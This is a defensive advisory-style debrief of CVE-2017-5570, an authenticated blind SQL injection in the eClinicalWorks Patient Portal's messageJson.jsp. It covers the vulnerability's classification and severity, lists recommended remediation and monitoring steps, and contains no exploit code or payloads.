CVE-2017-5570 Eclinicalworks CVE debrief

Who should care

Organizations running eClinicalWorks Patient Portal 7.0 build 13 should treat this as a priority, especially teams responsible for application security, database administration, and identity/access controls. It is most relevant where authenticated portal users can reach the affected endpoint or where the portal is exposed to broad internal or external audiences.

Technical summary

NVD maps this issue to CWE-89 and lists the affected CPE as eclinicalworks patient_portal 7.0. The vulnerability is a blind SQL injection in messageJson.jsp, exploitable by an authenticated user via HTTP POST. The description notes potential database exfiltration using out-of-band methods such as select_loadfile(), which implies attacker-controlled extraction without direct in-band query results. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) indicates network reachability, low attack complexity, and high impact if exploited.

Defensive priority

High. The issue requires authenticated access, but once that condition is met, the impact is severe and includes potential database disclosure. Prioritize any affected portal instances, especially if they are internet-facing or used by many users.

Recommended defensive actions

• Confirm whether any deployment is running eClinicalWorks Patient Portal 7.0 build 13 or another affected release.
• Apply vendor remediation or move to a fixed version if one is available.
• Review the messageJson.jsp request path and any related database-access code for parameterized queries and input validation.
• Restrict authenticated access to the portal to the smallest practical set of users and networks.
• Monitor application and database logs for unusual POST activity, unexpected SQL errors, and suspicious outbound data access patterns.
• Review database account privileges used by the portal and reduce them to the minimum required.
• If compromise is suspected, investigate for data access beyond normal portal use and rotate any credentials that may have been exposed.

Evidence notes

The core vulnerability details come from the supplied CVE/NVD record: CVE-2017-5570, published 2017-01-23 and last modified 2026-05-13, with CWE-89 and CVSS 3.0 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. The record explicitly states the issue is a blind SQL injection in messageJson.jsp, exploitable by authenticated users via HTTP POST, and usable for out-of-band database extraction. The supplied reference list includes SecurityFocus BID 95742 and a mirrored gist advisory, which corroborate the classification. No KEV listing was provided in the supplied enrichment.

Official resources